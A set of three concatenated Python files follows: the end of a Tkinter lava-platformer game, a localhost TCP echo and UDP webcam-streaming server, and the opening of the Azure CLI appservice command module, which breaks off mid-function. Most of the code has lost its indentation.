self.game.play_sound("{0}/level.mp3".format(self.game.soundspath))
if self.game.shop.job_button.jobs[1]["Go on transparent platforms"]["level"] > self.game.statistics["best_job_level"]:
self.game.statistics["best_job_level"] = self.game.shop.job_button.jobs[1]["Go on transparent platforms"]["level"]
if self.game.settings_button.dict["popups"]["value"] == 1 and self.game.settings_button.dict["popups"]["jobs"] == 1:
messagebox.showinfo("Info", "You passed next job level in \"Go on transparent platforms\" reward is {0} diamonds".format(self.game.shop.job_button.jobs[1]["Go on transparent platforms"]["reward"]-5)) #HERE
self.game.canvas.move(platform.id, 0, -10)
self.lava.fall = False
platform.touched = True
continue
if self.damage >= 25:
self.game.gameover(errortype="You hit the floor too hard")
else:
self.damage = 0
# print(platform.id_number)
self.lava.fall = True
if not platform.touched:
self.game.golevels.append(platform.id_number % 10)
self.game.golevels = list(filter(self.game.filter_func, self.game.golevels))
try:
if int(platform.id_number / 10) >= self.level and self.game.gameIsRunning: #len(self.game.golevels) == self.level:
self.level += 1
if self.level-1 > self.game.statistics["best_game_level"]:
self.game.statistics['best_game_level'] = self.level-1
if self.game.settings_button.dict["popups"]["value"] == 1 and self.game.settings_button.dict["popups"]["levels"] == 1:
messagebox.showinfo("lavaPlatformer", "You passed level {0}".format(self.level-1)) #HERE
except Exception as e:
print("Error", e)
# print(self.game.golevels)
self.game.statistics["platforms_jumped"] += 1
self.game.shop.job_button.jobs[0]["Jump on platforms"]["progress"] += 1
if self.game.shop.job_button.jobs[0]["Jump on platforms"]["progress"] == self.game.shop.job_button.jobs[0]["Jump on platforms"]["number"]:
self.game.shop.job_button.jobs[0]["Jump on platforms"]["number"] += 5
self.game.shop.job_button.jobs[0]["Jump on platforms"]["reward"] += 4
self.game.shop.job_button.jobs[0]["Jump on platforms"]["level"] += 1
self.game.diamonds += self.game.shop.job_button.jobs[0]["Jump on platforms"]["reward"] - 4
self.game.shop.job_button.jobs[0]["Jump on platforms"]["progress"] = 0
self.game.play_sound("{0}/level.mp3".format(self.game.soundspath))
if self.game.shop.job_button.jobs[0]["Jump on platforms"]["level"] > self.game.statistics["best_job_level"]:
self.game.statistics["best_job_level"] = self.game.shop.job_button.jobs[0]["Jump on platforms"]["level"]
if self.game.settings_button.dict["popups"]["value"] == 1 and self.game.settings_button.dict["popups"]["jobs"] == 1:
messagebox.showinfo("Info", "You passed next job level in \"Jump on platforms\" reward is {0} diamonds".format(self.game.shop.job_button.jobs[0]["Jump on platforms"]["reward"]-4)) #HERE
for x in range(2):
if platform.next:
last = None
for plat in self.game.platforms:
if plat.last:
last = plat
plat.last = False
break
c_p_pos = self.game.canvas.coords(last.id)
nx, ny, nx1, ny1 = c_p_pos
def check(v1, v2):
if v1 <= 0:
#print("IN")
return 200, 400
elif v2 >= 500:
#print("Out")
return 0,300
else:
return v1, v2
val1, val2 = check(nx-80, nx1+80)
x3 = random.randint(val1, val2)
n = random.random()
if n > 0.6:
x = "coin"
else:
x = "normal"
if len(self.game.platforms) > 17: #Next difficulty level
dt = random.random()
if x == "coin":
x = "coin"
elif dt < 0.3 and last.type != "death":
x = "death"
else:
x = "normal"
pl = Platform(self.game, x3, ny+100, 100, 15, last=True, num=self.game.platform_number, type=x, text="## LEVEL COMPLETED ##")
self.game.platform_number += 1
self.game.platforms.append(pl)
platform.touched = True
if platform.type == "coin" and not platform.on_coin:
self.game.play_sound("{0}/coin.mp3".format(self.game.soundspath))
self.game.shop.job_button.jobs[2]["Get coins"]["progress"] += 1
if self.game.shop.job_button.jobs[2]["Get coins"]["progress"] == self.game.shop.job_button.jobs[2]["Get coins"]["number"]:
self.game.shop.job_button.jobs[2]["Get coins"]["number"] += 5
self.game.shop.job_button.jobs[2]["Get coins"]["reward"] += 3
self.game.shop.job_button.jobs[2]["Get coins"]["level"] += 1
self.game.diamonds += self.game.shop.job_button.jobs[2]["Get coins"]["reward"] - 4
self.game.shop.job_button.jobs[2]["Get coins"]["progress"] = 0
self.game.play_sound("{0}/level.mp3".format(self.game.soundspath))
if self.game.settings_button.dict["popups"]["value"] == 1 and self.game.settings_button.dict["popups"]["jobs"] == 1:
messagebox.showinfo("Info", "You passed next job level in \"Get Coins\" reward is {0} diamonds".format(self.game.shop.job_button.jobs[2]["Get coins"]["reward"]-4)) #HERE
self.game.coins += 1
platform.on_coin = True
platform.reset_type()
self.y = 0
break
else:
self.game.canvas.move(platform.id, 0, -10)
self.lava.fall = False
x += 1
self.damage += 1
pos = self.game.canvas.coords(self.id)
# if pos[3] >= 500:
# self.game.gameIsRunning = False
lava_pos = self.game.canvas.coords(self.lava.id)
self.game.lava_dist = pos[1]-lava_pos[3]
if self.game.lava_dist <= 0:
self.game.gameover(errortype="Lava touched you!")
# print(len(self.game.platforms))
#print(self.game.lava_dist)
class Platform:
def __init__(self, game, x, y, w, h, last=False, next=True, type="normal", num=0, text=None):
self.game = game
self.id_number = num
self.last = last
if text is not None:
self.center_text = ""
if not text == "## LEVEL COMPLETED ##":
self.center_text = text
elif text == "## LEVEL COMPLETED ##" and self.id_number % 10 == 0:
self.center_text = "LEVEL {0} END".format(self.id_number // 10)
else:
self.center_text = ""#self.id_number
self.next = next
self.type = type
self.on_coin = False
self.touched = False
self.x_d, self.y_d, self.w_d, self.h_d = x, y, w, h
self.transform(self.type)
self.add_level_line()
self.set_platform_text()
def set_platform_text(self):
centerx, centery = self.x_d+self.w_d/2, self.y_d+self.h_d/2
self.centertxt = self.game.canvas.create_text(centerx, centery, anchor="center", text=self.center_text, tags=self.id)
def add_level_line(self):
x, y, x1, y1 = self.game.canvas.coords(self.id)
ly = y+((y1-y)/2)
if self.id_number % 10 == 0:
self.id_line = self.game.canvas.create_line(0, ly, x, ly, tags=self.id, dash=(4,2))
self.id_line2 = self.game.canvas.create_line(x1, ly, 500, ly, tags=self.id, dash=(4,2))
def transform(self, type):
x, y, w, h = self.x_d, self.y_d, self.w_d, self.h_d
centerx, centery = x+w/2, y+h/2
if type == "normal":
self.id_x = self.game.canvas.create_rectangle(x, y, x+w, y+h, tags="normal_platform{0}".format(self.id_number), fill="red")
self.id = "normal_platform{0}".format(self.id_number)
self.centertxt = self.game.canvas.create_text(centerx, centery, anchor="center", text=self.center_text, tags=self.id)
elif type == "coin":
self.id_x = self.game.canvas.create_rectangle(x, y, x+w, y+h, fill="red", tags="coin_platform{0}".format(self.id_number))
self.coin_id = self.game.canvas.create_oval(x+(w/2)-10, y-30, x+(w/2)-10+20, y-30+20, tags="coin_platform{0}".format(self.id_number), fill="yellow")
self.id = "coin_platform{0}".format(self.id_number)
self.centertxt = self.game.canvas.create_text(centerx, centery, anchor="center", text=self.center_text, tags=self.id)
elif type == "death":
self.id_x = self.game.canvas.create_rectangle(x, y, x+w, y+h, fill="gray80", tags="death_platform{0}".format(self.id_number))
self.id = "death_platform{0}".format(self.id_number)
self.centertxt = self.game.canvas.create_text(centerx, centery, anchor="center", text=self.center_text, tags=self.id)
def reset_type(self):
x, y, x1, y1 = self.game.canvas.coords(self.id_x)
centerx, centery = x+(x1-x)/2, y+(y1-y)/2
self.game.canvas.delete(self.id)
self.id_x = self.game.canvas.create_rectangle(x, y, x1, y1, fill="red", tags="normal_platform{0}".format(self.id_number))
self.id = "normal_platform{0}".format(self.id_number)
self.centertxt = self.game.canvas.create_text(centerx, centery, anchor="center", text=self.center_text, tags=self.id)
class Lava:
def __init__(self, game):
self.game = game
self.id = self.game.canvas.create_rectangle(0, 0, 500, 500, fill="orange")
self.game.canvas.move(self.id, 0, -850)
self.fall = True
def draw(self):
if self.fall:
self.game.canvas.move(self.id, 0, 2)
else:
self.game.canvas.move(self.id, 0, -7)
pos = self.game.canvas.coords(self.id)
if pos[3] >= 500:
self.game.gameover()
pass
def main(ktc=1, st=False):
global g, l, p, pl, pl2, pl3
g = Game(st=st, ktc=ktc)
g.setup_directory()
l = Lava(g)
p = Player(g, l)
pl = Platform(g, 20, 150, 100, 15, num=g.platform_number, text="START")
pl.touched = True
g.platform_number += 1
pl2 = Platform(g, 140, 250, 100, 15, type="coin", num=g.platform_number)
g.platform_number += 1
pl3 = Platform(g, 280, 350, 100, 15, last=True, num=g.platform_number)
g.platform_number += 1
g.platforms.append(pl)
g.platforms.append(pl2)
g.platforms.append(pl3)
g.at_start()
g.player_shop = p
g.mainloop()
if __name__ == '__main__':
main()
|
server_combined.py
|
#!/usr/bin/env python3
import cv2, imutils, socket, base64
from threading import Thread
tcp_server_address = ("127.0.0.1", 10001)
udp_server_address = ("127.0.0.1", 10002)
tcp_buff_size = 1024
udp_buff_size = 65536 # max buffer size
tcp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
udp_server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, udp_buff_size)
def tx_tcp():
print(f"Binding TCP server to {tcp_server_address}")
tcp_server_socket.bind(tcp_server_address)
tcp_server_socket.listen(1)
client_socket, client_address = tcp_server_socket.accept()
while True:
data = client_socket.recv(tcp_buff_size)
if not data:
    break  # an empty read means the client closed the connection
print(f"Received {data} from {client_address}")
client_socket.sendall(data)
print(f"Sent {data} back to {client_address}")
def tx_udp():
print(f"Binding UDP server to {udp_server_address}")
udp_server_socket.bind(udp_server_address)
vid = cv2.VideoCapture(0)
while True:
init_msg, client_address = udp_server_socket.recvfrom(udp_buff_size) # receive init message
print(f"Received init msg from {client_address}, starting video transmission...")
WIDTH=400
while vid.isOpened():
_, frame = vid.read()
frame = imutils.resize(frame, width=WIDTH) # if you want to reduce frame size
_, buffer = cv2.imencode('.jpg', frame, [cv2.IMWRITE_JPEG_QUALITY, 80]) # compress image
msg = base64.b64encode(buffer)
# print(f"Encoding: frame({frame.shape[0]*frame.shape[1]*frame.shape[2]}) -> encoded({len(buffer)}) -> base64({len(msg)})")
udp_server_socket.sendto(msg, client_address)
cv2.imshow("TRANSMITTING VIDEO", frame)
key = cv2.waitKey(1) & 0xFF
if key == ord('q'):
udp_server_socket.close()
break
# ----------------------- main loop -------------------------
tcp_thread = Thread(target=tx_tcp)
udp_thread = Thread(target=tx_udp)
tcp_thread.start()
udp_thread.start()
tcp_thread.join()
udp_thread.join()
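# Receiving-side sketch (illustrative only, not invoked by this script): a UDP
# client that sends the init message and then decodes the base64-encoded JPEG
# frames produced by tx_udp() above. The address, buffer size and frame format
# mirror the server; numpy is an extra dependency assumed for decoding.
def rx_udp_client_sketch():
    import numpy as np  # only needed for this sketch
    client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    client_socket.sendto(b"init", udp_server_address)  # announce ourselves
    while True:
        packet, _ = client_socket.recvfrom(udp_buff_size)
        data = base64.b64decode(packet)  # undo the base64 encoding
        frame = cv2.imdecode(np.frombuffer(data, dtype=np.uint8), cv2.IMREAD_COLOR)
        cv2.imshow("RECEIVING VIDEO", frame)
        if cv2.waitKey(1) & 0xFF == ord('q'):
            break
    client_socket.close()
    cv2.destroyAllWindows()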
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import ast
import threading
import time
from urllib.parse import urlparse
from urllib.request import urlopen
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from functools import reduce
import invoke
from nacl import encoding, public
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException, prompt_y_n
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.mgmt.web.models import KeyInfo
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait, get_file_json
from azure.cli.core.util import get_az_user_agent, send_raw_request
from azure.cli.core.profiles import ResourceType, get_sdk
from azure.cli.core.azclierror import (ResourceNotFoundError, RequiredArgumentMissingError, ValidationError,
CLIInternalError, UnclassifiedUserFault, AzureResponseError,
AzureInternalError, ArgumentUsageError)
from .tunnel import TunnelServer
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES
from ._client_factory import web_client_factory, ex_handler_factory, providers_client_factory
from ._appservice_utils import _generic_site_operation, _generic_settings_operation
from .utils import (_normalize_sku,
get_sku_name,
retryable_method,
raise_missing_token_suggestion,
_get_location_from_resource_group,
_list_app,
_rename_server_farm_props,
_get_location_from_webapp,
_normalize_location,
get_pool_manager)
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
check_resource_group_exists, set_location, get_site_availability, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src, get_current_stack_from_runtime, generate_default_app_name)
from ._constants import (FUNCTIONS_STACKS_API_JSON_PATHS, FUNCTIONS_STACKS_API_KEYS,
FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX,
NODE_EXACT_VERSION_DEFAULT, RUNTIME_STACKS, FUNCTIONS_NO_V2_REGIONS, PUBLIC_CLOUD,
LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH, WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH)
from ._github_oauth import (get_github_access_token)
from ._validators import validate_and_convert_to_int, validate_range_of_int_flag
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities.
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
using_webapp_up=False, language=None, assign_identities=None,
role='Contributor', scope=None, vnet=None, subnet=None):
from azure.mgmt.web.models import Site
SiteConfig, SkuDescription, NameValuePair = cmd.get_models(
'SiteConfig', 'SkuDescription', 'NameValuePair')
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(name=plan, resource_group_name=resource_group_name)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist in the resource group '{}".format(plan, resource_group_name))
is_linux = plan_info.reserved
node_default_version = NODE_EXACT_VERSION_DEFAULT
location = plan_info.location
# This is to keep the existing appsettings for a newly created webapp on existing webapp name.
name_validation = get_site_availability(cmd, name)
if not name_validation.name_available:
if name_validation.reason == 'Invalid':
raise CLIError(name_validation.message)
logger.warning("Webapp '%s' already exists. The command will use the existing app's settings.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that "
"the app is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in resource group '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
existing_app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name,
name, 'list_application_settings')
settings = []
for k, v in existing_app_settings.properties.items():
settings.append(NameValuePair(name=k, value=v))
site_config = SiteConfig(app_settings=settings)
else:
site_config = SiteConfig(app_settings=[])
if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
'B1', 'B2', 'B3', 'BASIC']:
site_config.always_on = True
if subnet or vnet:
subnet_info = _get_subnet_info(cmd=cmd,
resource_group_name=resource_group_name,
subnet=subnet,
vnet=vnet)
_validate_vnet_integration_location(cmd=cmd, webapp_location=plan_info.location,
subnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"])
_vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
vnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
subnet_name=subnet_info["subnet_name"])
site_config.vnet_route_all_enabled = True
subnet_resource_id = subnet_info["subnet_resource_id"]
else:
subnet_resource_id = None
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
https_only=using_webapp_up, virtual_network_subnet_id=subnet_resource_id)
helper = _StackRuntimeHelper(cmd, client, linux=is_linux)
if runtime:
runtime = helper.remove_delimiters(runtime)
current_stack = None
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
match['setter'](cmd=cmd, stack=match, site_config=site_config)
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
if deployment_container_image_name:
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
# set the needed app settings for container image validation
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_USERNAME",
value=docker_registry_server_user))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_PASSWORD",
value=docker_registry_server_password))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_URL",
value=docker_registry_server_url))
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Windows runtime '{}' is not supported. "
"Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
match['setter'](cmd=cmd, stack=match, site_config=site_config)
# TODO: Ask Calvin the purpose of this - seems like unneeded set of calls
# portal uses the current_stack property in metadata to display stack for windows apps
current_stack = get_current_stack_from_runtime(runtime)
else: # windows webapp without runtime specified
if name_validation.name_available: # If creating new webapp
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
if using_webapp_up: # when the routine is invoked as a help method for webapp up
if name_validation.name_available:
logger.info("will set appsetting for enabling build")
site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
if language is not None and language.lower() == 'dotnetcore':
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
value='https://{}.scm.azurewebsites.net/detectors'
.format(name)))
poller = client.web_apps.begin_create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
# TO DO: (Check with Calvin) This seems to be something specific to portal client use only & should be removed
if current_stack:
_update_webapp_current_stack_property_if_needed(cmd, resource_group_name, name, current_stack)
# Ensure SCC operations follow right after the 'create', with no preceding appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
if deployment_container_image_name:
logger.info("Updating container settings")
update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
webapp.identity = identity
return webapp
def _validate_vnet_integration_location(cmd, subnet_resource_group, vnet_name, webapp_location):
vnet_client = network_client_factory(cmd.cli_ctx).virtual_networks
vnet_location = vnet_client.get(resource_group_name=subnet_resource_group,
virtual_network_name=vnet_name).location
vnet_location = _normalize_location(cmd, vnet_location)
asp_location = _normalize_location(cmd, webapp_location)
if vnet_location != asp_location:
raise ArgumentUsageError("Unable to create webapp: vnet and App Service Plan must be in the same location. "
"vnet location: {}. Plan location: {}.".format(vnet_location, asp_location))
def _get_subnet_info(cmd, resource_group_name, vnet, subnet):
from azure.cli.core.commands.client_factory import get_subscription_id
subnet_info = {"vnet_name": None,
"subnet_name": None,
"resource_group_name": None,
"subnet_resource_id": None,
"subnet_subscription_id": None,
"vnet_resource_id": None}
if is_valid_resource_id(subnet):
if vnet:
logger.warning("--subnet argument is a resource ID. Ignoring --vnet argument.")
parsed_sub_rid = parse_resource_id(subnet)
subnet_info["vnet_name"] = parsed_sub_rid["name"]
subnet_info["subnet_name"] = parsed_sub_rid["resource_name"]
subnet_info["resource_group_name"] = parsed_sub_rid["resource_group"]
subnet_info["subnet_resource_id"] = subnet
subnet_info["subnet_subscription_id"] = parsed_sub_rid["subscription"]
vnet_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}"
subnet_info["vnet_resource_id"] = vnet_fmt.format(parsed_sub_rid["subscription"],
parsed_sub_rid["resource_group"],
parsed_sub_rid["name"])
return subnet_info
subnet_name = subnet
if is_valid_resource_id(vnet):
parsed_vnet = parse_resource_id(vnet)
subnet_rg = parsed_vnet["resource_group"]
vnet_name = parsed_vnet["name"]
subscription_id = parsed_vnet["subscription"]
subnet_info["vnet_resource_id"] = vnet
else:
logger.warning("Assuming subnet resource group is the same as webapp. "
"Use a resource ID for --subnet or --vnet to use a different resource group.")
subnet_rg = resource_group_name
vnet_name = vnet
subscription_id = get_subscription_id(cmd.cli_ctx)
vnet_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}"
subnet_info["vnet_resource_id"] = vnet_fmt.format(subscription_id,
subnet_rg,
vnet)
subnet_id_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}/subnets/{}"
subnet_rid = subnet_id_fmt.format(subscription_id, subnet_rg, vnet_name, subnet_name)
subnet_info["vnet_name"] = vnet_name
subnet_info["subnet_name"] = subnet_name
subnet_info["resource_group_name"] = subnet_rg
subnet_info["subnet_resource_id"] = subnet_rid
subnet_info["subnet_subscription_id"] = subscription_id
return subnet_info
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1 # you can only specify one of these options
def parse_docker_image_name(deployment_container_image_name):
if not deployment_container_image_name:
return None
non_url = "/" not in deployment_container_image_name
non_url = non_url or ("." not in deployment_container_image_name and ":" not in deployment_container_image_name)
if non_url:
return None
parsed_url = urlparse(deployment_container_image_name)
if parsed_url.scheme:
return parsed_url.hostname
hostname = urlparse("https://{}".format(deployment_container_image_name)).hostname
return "https://{}".format(hostname)
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings | --slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest, setting_type in [(settings, result, "Settings"), (slot_settings, slot_result, "SlotSettings")]:
for s in src:
try:
temp = shell_safe_json_parse(s)
if isinstance(temp, list): # a bit messy, but we'd like to accept the output of the "list" command
for t in temp:
if 'slotSetting' in t.keys():
slot_result[t['name']] = t['slotSetting']
if setting_type == "SlotSettings":
slot_result[t['name']] = True
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(dest)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
# Slot settings logic to add a new setting(s) or remove an existing setting(s)
for slot_setting_name, value in slot_result.items():
if value and slot_setting_name not in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.append(slot_setting_name)
elif not value and slot_setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(slot_setting_name)
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
app = client.web_apps.get(resource_group_name, name)
if app is None:
raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. '
'Please make sure these values are correct.'.format(name, resource_group_name))
parse_plan_id = parse_resource_id(app.server_farm_id)
plan_info = None
retry_delay = 10 # seconds
# We need to retry getting the plan because, when the plan is created as part of the function app,
# it can take a couple of tries before the plan becomes available
for _ in range(5):
plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
parse_plan_id['name'])
if plan_info is not None:
break
time.sleep(retry_delay)
is_consumption = is_plan_consumption(cmd, plan_info)
if (not build_remote) and is_consumption and app.reserved:
return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
if build_remote and app.reserved:
add_remote_build_app_settings(cmd, resource_group_name, name, slot)
elif app.reserved:
remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
logger.warning("Getting scm site credentials for zip deployment")
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
try:
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
except ValueError:
